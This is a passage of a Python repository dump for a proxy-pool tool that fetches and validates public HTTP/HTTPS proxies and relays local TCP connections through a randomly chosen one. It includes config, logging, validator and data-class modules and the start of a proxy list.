print(str(e)) 97 | return '' 98 | 99 | @property 100 | def code(self): 101 | encodings = requests.utils.get_encodings_from_content(self.response.text) 102 | if encodings: 103 | return encodings[0] 104 | else: 105 | return self.response.apparent_encoding 106 | 107 | @property 108 | def tree(self): 109 | return etree.HTML(self.response.content.decode(self.code, 'ignore')) 110 | 111 | @property 112 | def text(self): 113 | return 
self.response.text 114 | 115 | @property 116 | def json(self): 117 | try: 118 | return self.response.json() 119 | except Exception as e: 120 | self.log.error(str(e)) 121 | return {} -------------------------------------------------------------------------------- /Proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/__init__.py -------------------------------------------------------------------------------- /Proxy/handler/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: __init__.py 5 | Description : 6 | Author : JHao 7 | date: 2016/12/3 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2016/12/3: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | # from handler.ProxyManager import ProxyManager 16 | -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/configHandler.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/configHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/logHandler.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/logHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/configHandler.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: configHandler 5 | Description : 6 | Author : JHao 7 | date: 2020/6/22 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2020/6/22: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | import os 16 | import Proxy.proxySetting as setting 17 | from Proxy.util.singleton import Singleton 18 | from Proxy.util.lazyProperty import LazyProperty 19 | from Proxy.util.six import reload_six, withMetaclass 20 | 21 | 22 | class ConfigHandler(withMetaclass(Singleton)): 23 | 24 | def __init__(self): 25 | pass 26 | 27 | #@LazyProperty 28 | #def serverHost(self): 29 | # return os.environ.get("HOST", setting.HOST) 30 | 31 | #@LazyProperty 32 | #def serverPort(self): 33 | # return os.environ.get("PORT", setting.PORT) 34 | 35 | #@LazyProperty 36 | #def dbConn(self): 37 | # return os.getenv("DB_CONN", setting.DB_CONN) 38 | 39 | #@LazyProperty 40 | #def tableName(self): 41 | # return os.getenv("TABLE_NAME", setting.TABLE_NAME) 42 | 43 | #@property 44 | #def fetchers(self): 45 | # reload_six(setting) 46 | # return setting.PROXY_FETCHER 47 | 48 | 
@LazyProperty 49 | def httpUrl(self): 50 | return os.getenv("HTTP_URL", setting.HTTP_URL) 51 | 52 | @LazyProperty 53 | def httpsUrl(self): 54 | return os.getenv("HTTPS_URL", setting.HTTPS_URL) 55 | 56 | @LazyProperty 57 | def verifyTimeout(self): 58 | return os.getenv("VERIFY_TIMEOUT", setting.VERIFY_TIMEOUT) 59 | 60 | # @LazyProperty 61 | # def proxyCheckCount(self): 62 | # return os.getenv("PROXY_CHECK_COUNT", setting.PROXY_CHECK_COUNT) 63 | 64 | @LazyProperty 65 | def maxFailCount(self): 66 | return os.getenv("MAX_FAIL_COUNT", setting.MAX_FAIL_COUNT) 67 | 68 | # @LazyProperty 69 | # def maxFailRate(self): 70 | # return os.getenv("MAX_FAIL_RATE", setting.MAX_FAIL_RATE) 71 | 72 | @LazyProperty 73 | def poolSizeMin(self): 74 | return os.getenv("POOL_SIZE_MIN", setting.POOL_SIZE_MIN) 75 | 76 | @LazyProperty 77 | def timezone(self): 78 | return os.getenv("TIMEZONE", setting.TIMEZONE) 79 | 80 | -------------------------------------------------------------------------------- /Proxy/handler/logHandler.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: LogHandler.py 5 | Description : 日志操作模块 6 | Author : JHao 7 | date: 2017/3/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2017/03/06: log handler 11 | 2017/09/21: 屏幕输出/文件输出 可选(默认屏幕和文件均输出) 12 | 2020/07/13: Windows下TimedRotatingFileHandler线程不安全, 不再使用 13 | ------------------------------------------------- 14 | """ 15 | __author__ = 'JHao' 16 | 17 | import os 18 | import logging 19 | import platform 20 | 21 | from logging.handlers import TimedRotatingFileHandler 22 | from logging import FileHandler 23 | 24 | # 日志级别 25 | CRITICAL = 50 26 | FATAL = CRITICAL 27 | ERROR = 40 28 | WARNING = 30 29 | WARN = WARNING 30 | INFO = 20 31 | DEBUG = 10 32 | NOTSET = 0 33 | 34 | CURRENT_PATH = os.path.dirname(os.path.abspath(__file__)) 35 | ROOT_PATH = 
os.path.join(CURRENT_PATH, os.pardir) 36 | LOG_PATH = os.path.join(ROOT_PATH, 'log') 37 | 38 | if not os.path.exists(LOG_PATH): 39 | try: 40 | os.mkdir(LOG_PATH) 41 | except FileExistsError: 42 | pass 43 | 44 | 45 | class LogHandler(logging.Logger): 46 | """ 47 | LogHandler 48 | """ 49 | 50 | def __init__(self, name, level=DEBUG, stream=False, file=True): 51 | self.name = name 52 | self.level = level 53 | logging.Logger.__init__(self, self.name, level=level) 54 | if stream: 55 | self.__setStreamHandler__() 56 | if file: 57 | if platform.system() == "Windows": 58 | self.__setFileHandler__() 59 | 60 | def __setFileHandler__(self, level=None): 61 | """ 62 | set file handler 63 | :param level: 64 | :return: 65 | """ 66 | file_name = os.path.join(LOG_PATH, '{name}.log'.format(name=self.name)) 67 | # 设置日志回滚, 保存在log目录, 一天保存一个文件, 保留15天 68 | file_handler = TimedRotatingFileHandler(filename=file_name, when='D', interval=1, backupCount=15) 69 | #file_handler = FileHandler(filename=file_name, mode='a', encoding='utf-8') 70 | file_handler.suffix = '%Y%m%d.log' 71 | if not level: 72 | file_handler.setLevel(self.level) 73 | else: 74 | file_handler.setLevel(level) 75 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s') 76 | 77 | file_handler.setFormatter(formatter) 78 | self.file_handler = file_handler 79 | self.addHandler(file_handler) 80 | 81 | def __setStreamHandler__(self, level=None): 82 | """ 83 | set stream handler 84 | :param level: 85 | :return: 86 | """ 87 | stream_handler = logging.StreamHandler() 88 | formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s') 89 | stream_handler.setFormatter(formatter) 90 | if not level: 91 | stream_handler.setLevel(self.level) 92 | else: 93 | stream_handler.setLevel(level) 94 | self.addHandler(stream_handler) 95 | 96 | 97 | if __name__ == '__main__': 98 | log = LogHandler('test') 99 | log.info('this is a test msg') 
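# ---- /Proxy/handler/proxyHandler.py ----
# -*- coding: utf-8 -*-
# from hutaow
import sys
import socket
import logging
import threading
import random

local_ip = '127.0.0.1'
local_port = 10086
PKT_BUFF_SIZE = 2048
# How many times tcp_mapping_request() tries to reach the upstream proxy before
# it gives up on the client connection (the previous loop retried forever).
CONNECT_RETRIES = 3

# Log setup (日志设置): everything goes to stderr at DEBUG.
logger = logging.getLogger("Proxy Logging")
formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)
stream_handler = logging.StreamHandler(sys.stderr)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.setLevel(logging.DEBUG)


def tcp_mapping_worker(conn_receiver, conn_sender):
    """Pump bytes from conn_receiver to conn_sender until EOF or an error.

    One thread per direction is started by tcp_mapping_request(). Whichever
    side ends the loop, both sockets are closed, so the thread pumping the
    other direction fails on its next recv()/sendall() and shuts down too.
    """
    try:
        while True:
            try:
                data = conn_receiver.recv(PKT_BUFF_SIZE)
            except Exception:
                print('Connection closed.')
                break
            if not data:
                print('No more data is received.')
                break
            try:
                conn_sender.sendall(data)
            except Exception:
                print('Failed sending data.')
                break
            print('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))
    finally:
        # getpeername() in the trace line can raise once a peer is gone; the
        # sockets must be released in that case as well.
        conn_receiver.close()
        conn_sender.close()
    return


def tcp_mapping_request(local_conn, remote_ip, remote_port):
    """Connect to remote_ip:remote_port and start the two relay threads.

    remote_port may be an int or a numeric str: switchPro() hands over the
    str produced by "ip:port".split(":"), which socket.connect() rejects.
    After CONNECT_RETRIES failed attempts the client socket is closed and the
    function returns; each failed upstream socket is closed before retrying,
    so no descriptor is leaked per attempt.
    """
    try:
        port = int(remote_port)
    except (TypeError, ValueError):
        print('Unable to connect to the remote server.')
        local_conn.close()
        return
    for _ in range(CONNECT_RETRIES):
        remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # NOTE(review): the 3 s timeout is never cleared after connect(),
            # so it also bounds every recv() in the relay -- an upstream idle
            # for more than 3 s is reported as 'Connection closed.'. Confirm
            # that this is intended before changing it.
            remote_conn.settimeout(3)
            remote_conn.connect((remote_ip, port))
        except Exception:
            print('Unable to connect to the remote server.')
            remote_conn.close()
            continue
        threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
        threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
        return
    local_conn.close()


def switchPro(proxylist):
    """Accept loopback connections and relay each one through a random proxy.

    proxylist holds "ip:port" strings. The server binds to local_ip:local_port
    (127.0.0.1 only) and stops when accept() or the proxy pick fails, e.g. on
    an empty proxylist, closing the listening socket.
    """
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_server.bind((local_ip, local_port))
    local_server.listen(5)
    print('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')

    while True:
        try:
            (local_conn, local_addr) = local_server.accept()
            proxyip = random.choice(proxylist)
            print("[!]Now proxy ip:"+str(proxyip))
            prip, prpo = proxyip.split(":")
        except Exception:
            local_server.close()
            print('Stop mapping service.')
            break
        # prpo is still a str here; tcp_mapping_request() converts it.
        threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
        print('Receive mapping request from %s:%d.' % local_addr)


def Loadips():
    """Read 'ips.txt' (one "ip:port" per line) from the working directory.

    Returns a list of (ip, port) tuples with port as an int. Blank lines are
    skipped. The port is parsed with int() instead of eval(): the file is
    data, and eval() would run any Python expression written into it.
    NOTE(review): the ips.txt shipped in this tree holds one JSON object per
    line, which this "ip:port" parser does not read -- confirm which format
    the callers expect.
    """
    ip_list = []
    with open('ips.txt') as ips:
        for line in ips:
            line = line.strip()
            if not line:
                continue
            host, port = line.split(":")
            ip_list.append((host, int(port)))
    return ip_list


if __name__ == '__main__':
    a = Loadips()
    print(a)
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_server.bind((local_ip, local_port))
    local_server.listen(5)
    logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')
    while True:
        try:
            (local_conn, local_addr) = local_server.accept()
            proxyip = random.choice(a)
            print("[!]Now proxy ip:"+str(proxyip))
            prip = proxyip[0]
            prpo= proxyip[1]
        except Exception:
            local_server.close()
            logger.debug('Stop mapping service.')
            break
        threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
        logger.debug('Receive mapping request from %s:%d.'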
% local_addr) -------------------------------------------------------------------------------- /Proxy/helper/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__init__.py -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/check.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/check.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/proxy.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/proxy.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/__pycache__/validator.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/helper/__pycache__/validator.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/helper/check.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | 
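File Name: check
Description : run proxy validation
Author : JHao
date: 2019/8/6
-------------------------------------------------
Change Activity:
2019/08/06: run proxy validation
2021/05/25: validate http and https separately
-------------------------------------------------
"""
__author__ = 'JHao'

from Proxy.util.six import Empty
from threading import Thread
from datetime import datetime
from Proxy.handler.logHandler import LogHandler
from Proxy.helper.validator import ProxyValidator
from Proxy.handler.configHandler import ConfigHandler
import threading


class DoValidator(object):
    """Run the validator lists registered on ProxyValidator against a Proxy."""

    @classmethod
    def validator(cls, proxy):
        """Validation entry point.

        Runs the http validators first and the https validators only when http
        passed, then updates the bookkeeping on the Proxy: check_count and
        last_time always; on success fail_count is decremented (not below 0)
        and https set from the https result; on failure fail_count is
        incremented.

        Args:
            proxy: Proxy object
        Returns:
            the same Proxy object, updated in place
        """
        http_r = cls.httpValidator(proxy)
        https_r = False if not http_r else cls.httpsValidator(proxy)

        proxy.check_count += 1
        proxy.last_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        proxy.last_status = bool(http_r)
        if http_r:
            if proxy.fail_count > 0:
                proxy.fail_count -= 1
            proxy.https = bool(https_r)
        else:
            proxy.fail_count += 1
        return proxy

    @classmethod
    def http_or_https(cls, proxy, anonymous=False):
        """Run one validator family chosen from the proxy's https tag.

        proxy.https is a bool in freshly built Proxy objects (see Proxy.__init__)
        but a str such as 'HTTP'/'HTTPS' once loaded from ips.txt or tagged by
        httpValidator/httpsValidator; `'HTTPS' in False` raises TypeError, so
        the str test is only applied to str values and True selects https.
        """
        if anonymous:
            cls.anonymousValidator(proxy)
            return
        tag = proxy.https
        if tag is True or (isinstance(tag, str) and ('HTTPS' in tag or '支持' in tag)):
            cls.httpsValidator(proxy)
        else:
            cls.httpValidator(proxy)

    @classmethod
    def httpValidator(cls, proxy):
        """True when every registered http validator accepts proxy; tags it 'HTTP'."""
        for func in ProxyValidator.http_validator:
            if not func(proxy):
                proxy.last_status = None
                return False
        proxy._https = 'HTTP'
        return True

    @classmethod
    def httpsValidator(cls, proxy):
        """True when every registered https validator accepts proxy; tags it 'HTTPS'."""
        for func in ProxyValidator.https_validator:
            if not func(proxy):
                proxy.last_status = None
                return False
        proxy._https = 'HTTPS'
        return True

    @classmethod
    def preValidator(cls, proxy):
        """True when every registered pre-validator accepts proxy.

        Fetcher.run() (fetch.py) passes the raw "ip:port" str here, not a
        Proxy object, so last_status is only cleared when the argument can
        carry it; a str has no such attribute and would raise AttributeError.
        """
        for func in ProxyValidator.pre_validator:
            if not func(proxy):
                if not isinstance(proxy, str):
                    proxy.last_status = None
                return False
        return True

    @classmethod
    def anonymousValidator(cls, proxy):
        """True when every registered anonymity validator accepts proxy.

        Sets _anonymous to '高匿' (anonymous) on success and '透明'
        (transparent) on the first failure.
        """
        for func in ProxyValidator.anonymous_validator:
            if not func(proxy):
                proxy.last_status = None
                proxy._anonymous = '透明'
                return False
        proxy._anonymous = '高匿'
        return True


class _ThreadChecker(Thread):
    """Worker thread: pulls Proxy objects off a queue and validates them.

    temp_list is shared by all workers and collects the "ip:port" of every
    proxy that passed; it is a class attribute, so it also persists across
    Checker() calls.
    """
    threadLock = threading.Lock()
    temp_list = []

    def __init__(self, work_type, target_queue, thread_name):
        Thread.__init__(self, name=thread_name)
        self.work_type = work_type
        self.log = LogHandler("checker")
        #self.proxy_handler = ProxyHandler()
        self.target_queue = target_queue
        self.conf = ConfigHandler()

    def run(self):
        """Drain target_queue without blocking; stop when it is empty."""
        self.log.info("{}ProxyCheck - {}: start".format(self.work_type.title(), self.name))
        while True:
            try:
                proxy = self.target_queue.get(block=False)
            except Empty:
                self.log.info("{}ProxyCheck - {}: complete".format(self.work_type.title(), self.name))
                break
            try:
                proxy = DoValidator.validator(proxy)
                if proxy.last_status or proxy.https:
                    self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
                    # list.append is atomic under the GIL; threadLock is kept for callers that need it
                    _ThreadChecker.temp_list.append(proxy.proxy)
                else:
                    self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23)))
            finally:
                # Always balance get() so a queue.join() elsewhere cannot hang on a failed item.
                self.target_queue.task_done()

    #def __ifRaw(self, proxy):
    #    if proxy.last_status:
    #        if self.proxy_handler.exists(proxy):
    #            self.log.info('RawProxyCheck - {}: {} exist'.format(self.name, proxy.proxy.ljust(23)))
    #        else:
    #            self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
    #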
self.proxy_handler.put(proxy) 138 | # else: 139 | # self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23))) 140 | 141 | #def __ifUse(self, proxy): 142 | # if proxy.last_status: 143 | # self.log.info('UseProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23))) 144 | # self.proxy_handler.put(proxy) 145 | # else: 146 | # if proxy.fail_count > self.conf.maxFailCount: 147 | # self.log.info('UseProxyCheck - {}: {} fail, count {} delete'.format(self.name, 148 | # proxy.proxy.ljust(23), 149 | # proxy.fail_count)) 150 | # self.proxy_handler.delete(proxy) 151 | # else: 152 | # self.log.info('UseProxyCheck - {}: {} fail, count {} keep'.format(self.name, 153 | # proxy.proxy.ljust(23), 154 | # proxy.fail_count)) 155 | # self.proxy_handler.put(proxy) 156 | 157 | def Checker(tp='raw', queue=None): 158 | """ 159 | run Proxy ThreadChecker 160 | :param tp: raw/use 161 | :param queue: Proxy Queue 162 | :return: 163 | """ 164 | thread_list = list() 165 | for index in range(20): 166 | thread_list.append(_ThreadChecker(tp, queue, "thread_%s" % str(index).zfill(2))) 167 | 168 | for thread in thread_list: 169 | thread.setDaemon(True) 170 | thread.start() 171 | 172 | for thread in thread_list: 173 | thread.join() 174 | 175 | return _ThreadChecker.temp_list -------------------------------------------------------------------------------- /Proxy/helper/fetch.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: fetchScheduler 5 | Description : 6 | Author : JHao 7 | date: 2019/8/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/08/06: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | from Proxy.helper.proxy import Proxy 16 | from Proxy.helper.check import DoValidator 17 | from Proxy.handler.logHandler import LogHandler 18 | #from 
Proxy.handler.proxyHandler import ProxyHandler 19 | from Proxy.proxyFetcher import ProxyFetcher 20 | from Proxy.handler.configHandler import ConfigHandler 21 | 22 | 23 | class Fetcher(object): 24 | name = "fetcher" 25 | 26 | def __init__(self): 27 | self.log = LogHandler(self.name) 28 | self.conf = ConfigHandler() 29 | #self.proxy_handler = ProxyHandler() 30 | 31 | def run(self): 32 | """ 33 | fetch proxy with proxyFetcher 34 | :return: 35 | """ 36 | proxy_dict = dict() 37 | self.log.info("ProxyFetch : start") 38 | for fetch_source in self.conf.fetchers: 39 | self.log.info("ProxyFetch - {func}: start".format(func=fetch_source)) 40 | fetcher = getattr(ProxyFetcher, fetch_source, None) 41 | if not fetcher: 42 | self.log.error("ProxyFetch - {func}: class method not exists!".format(func=fetch_source)) 43 | continue 44 | if not callable(fetcher): 45 | self.log.error("ProxyFetch - {func}: must be class method".format(func=fetch_source)) 46 | continue 47 | 48 | try: 49 | for proxy in fetcher(): 50 | self.log.info('ProxyFetch - %s: %s ok' % (fetch_source, proxy.ljust(23))) 51 | proxy = proxy.strip() 52 | if proxy in proxy_dict: 53 | proxy_dict[proxy].add_source(fetch_source) 54 | else: 55 | proxy_dict[proxy] = Proxy(proxy, source=fetch_source) 56 | except Exception as e: 57 | self.log.error("ProxyFetch - {func}: error".format(func=fetch_source)) 58 | self.log.error(str(e)) 59 | self.log.info("ProxyFetch - all complete!") 60 | for _ in proxy_dict.values(): 61 | if DoValidator.preValidator(_.proxy): 62 | yield _ 63 | -------------------------------------------------------------------------------- /Proxy/helper/proxy.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: Proxy 5 | Description : 代理对象类型封装 6 | Author : JHao 7 | date: 2019/7/11 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2019/7/11: 代理对象类型封装 11 | 
------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | import json 16 | 17 | 18 | class Proxy(object): 19 | 20 | def __init__(self, proxy, fail_count=0, region="", anonymous="", 21 | source="", check_count=0, last_status="", last_time="", https=False): 22 | self._proxy = proxy 23 | self._fail_count = fail_count 24 | self._region = region 25 | self._anonymous = anonymous 26 | self._source = source.split('/') 27 | self._check_count = check_count 28 | self._last_status = last_status 29 | self._last_time = last_time 30 | self._https = https 31 | 32 | @classmethod 33 | def createFromJson(cls, proxy_json): 34 | _dict = json.loads(proxy_json) 35 | return cls(proxy=_dict.get("proxy", ""), 36 | fail_count=_dict.get("fail_count", 0), 37 | region=_dict.get("region", ""), 38 | anonymous=_dict.get("anonymous", ""), 39 | source=_dict.get("source", ""), 40 | check_count=_dict.get("check_count", 0), 41 | last_status=_dict.get("last_status", ""), 42 | last_time=_dict.get("last_time", ""), 43 | https=_dict.get("https", False) 44 | ) 45 | 46 | @property 47 | def proxy(self): 48 | """ 代理 ip:port """ 49 | return self._proxy 50 | 51 | @property 52 | def fail_count(self): 53 | """ 检测失败次数 """ 54 | return self._fail_count 55 | 56 | @property 57 | def region(self): 58 | """ 地理位置(国家/城市) """ 59 | return self._region 60 | 61 | @property 62 | def anonymous(self): 63 | """ 匿名 """ 64 | return self._anonymous 65 | 66 | @property 67 | def source(self): 68 | """ 代理来源 """ 69 | return '/'.join(self._source) 70 | 71 | @property 72 | def check_count(self): 73 | """ 代理检测次数 """ 74 | return self._check_count 75 | 76 | @property 77 | def last_status(self): 78 | """ 最后一次检测结果 True -> 可用; False -> 不可用""" 79 | return self._last_status 80 | 81 | @property 82 | def last_time(self): 83 | """ 最后一次检测时间 """ 84 | return self._last_time 85 | 86 | @property 87 | def https(self): 88 | """ 是否支持https """ 89 | return self._https 90 | 91 | @property 92 | def to_dict(self): 93 | """ 属性字典 
""" 94 | return {"proxy": self.proxy, 95 | "https": self.https, 96 | "fail_count": self.fail_count, 97 | "region": self.region, 98 | "anonymous": self.anonymous, 99 | "source": self.source, 100 | "check_count": self.check_count, 101 | "last_status": self.last_status, 102 | "last_time": self.last_time} 103 | 104 | @property 105 | def to_json(self): 106 | """ 属性json格式 """ 107 | return json.dumps(self.to_dict, ensure_ascii=False) 108 | 109 | @fail_count.setter 110 | def fail_count(self, value): 111 | self._fail_count = value 112 | 113 | @check_count.setter 114 | def check_count(self, value): 115 | self._check_count = value 116 | 117 | @last_status.setter 118 | def last_status(self, value): 119 | self._last_status = value 120 | 121 | @last_time.setter 122 | def last_time(self, value): 123 | self._last_time = value 124 | 125 | @https.setter 126 | def https(self, value): 127 | self._https = value 128 | 129 | def add_source(self, source_str): 130 | if source_str: 131 | self._source.append(source_str) 132 | self._source = list(set(self._source)) 133 | -------------------------------------------------------------------------------- /Proxy/helper/validator.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: _validators 5 | Description : 定义proxy验证方法 6 | Author : JHao 7 | date: 2021/5/25 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2021/5/25: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | from re import findall 16 | from requests import head,get 17 | from Proxy.util.six import withMetaclass 18 | from Proxy.util.singleton import Singleton 19 | from Proxy.handler.configHandler import ConfigHandler 20 | import json 21 | 22 | conf = ConfigHandler() 23 | 24 | HEADER = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 25 
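'Accept': '*/*',
          'Connection': 'keep-alive',
          'Accept-Language': 'zh-CN,zh;q=0.8'}


class ProxyValidator(withMetaclass(Singleton)):
    """Registry of validator callables, filled by the add*Validator decorators.

    Each list holds plain functions that take one argument and return a bool;
    DoValidator (check.py) calls them in registration order and stops at the
    first False.
    """
    pre_validator = []        # called with the raw "ip:port" str, before any network I/O
    http_validator = []       # called with a Proxy object: plain-HTTP reachability
    https_validator = []      # called with a Proxy object: HTTPS reachability
    anonymous_validator = []  # called with a Proxy object: anonymity probe

    @classmethod
    def addPreValidator(cls, func):
        """Register func as a pre-validator and return it unchanged (decorator use)."""
        cls.pre_validator.append(func)
        return func

    @classmethod
    def addHttpValidator(cls, func):
        """Register func as an http validator and return it unchanged."""
        cls.http_validator.append(func)
        return func

    @classmethod
    def addHttpsValidator(cls, func):
        """Register func as an https validator and return it unchanged."""
        cls.https_validator.append(func)
        return func

    @classmethod
    def addAnonymousValidator(cls, func):
        """Register func as an anonymity validator and return it unchanged."""
        cls.anonymous_validator.append(func)
        return func


@ProxyValidator.addPreValidator
def formatValidator(proxy):
    """检查代理格式 -- accept only a dotted-quad IPv4 plus a port, exactly as given.

    The regex bounds digit counts only; the numeric ranges are checked as well
    so that strings such as "999.1.1.1:70000", which come from third-party
    fetch sources, are rejected before any network check is spent on them.
    """
    verify_regex = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}"
    _proxy = findall(verify_regex, proxy)
    if len(_proxy) != 1 or _proxy[0] != proxy:
        return False
    host, port = proxy.split(":")
    if not all(0 <= int(octet) <= 255 for octet in host.split(".")):
        return False
    return 1 <= int(port) <= 65535


@ProxyValidator.addHttpValidator
def httpTimeOutValidator(proxy):
    """http检测超时 -- True when a HEAD of conf.httpUrl through the proxy returns 200 within conf.verifyTimeout."""
    proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}

    try:
        # NOTE(review): conf.verifyTimeout comes from os.getenv() when
        # VERIFY_TIMEOUT is set in the environment, i.e. a str; requests
        # rejects a str timeout, and the except below would then report
        # every proxy as dead. Confirm the setting is numeric.
        r = head(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout)
        return r.status_code == 200
    except Exception:
        # Any transport error (refused, timeout, bad proxy reply) counts as a failed check.
        return False


@ProxyValidator.addHttpsValidator
def httpsTimeOutValidator(proxy):
    """https检测超时 -- True when a HEAD of conf.httpsUrl through the proxy returns 200 within conf.verifyTimeout."""
    # NOTE(review): "https://{proxy}" asks requests to speak TLS *to the proxy*
    # itself; a plain HTTP proxy that tunnels HTTPS via CONNECT is normally
    # given as "http://{proxy}" for the "https" key too -- confirm against the
    # proxies this pool actually handles.
    proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
    try:
        # verify=False: this only measures whether the proxy relays TLS at all,
        # it does not validate the target certificate; do not reuse this
        # request path for real traffic.
        r = head(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
        #r = get(conf.httpsUrl,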
headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False) 88 | #return True if r.status_code == 200 and ',' not in r.text else False 89 | return True if r.status_code == 200 else False 90 | except Exception as e: 91 | return False 92 | 93 | @ProxyValidator.addAnonymousValidator 94 | def customValidatorExample(proxy): 95 | """自定义validator函数,校验代理是否可用, 返回True/False""" 96 | """高匿代理检测""" 97 | proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)} 98 | try: 99 | r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False) 100 | return True if r.status_code == 200 and ',' not in r.text else False 101 | #return True if r.status_code == 200 else False 102 | except Exception as e: 103 | return False 104 | #return True 105 | -------------------------------------------------------------------------------- /Proxy/ips.txt: -------------------------------------------------------------------------------- 1 | {"proxy": "47.57.188.208:80", "https": "HTTP", "anonymous": "\u900f\u660e"} 2 | {"proxy": "112.6.117.135:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"} 3 | {"proxy": "112.6.117.178:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"} 4 | {"proxy": 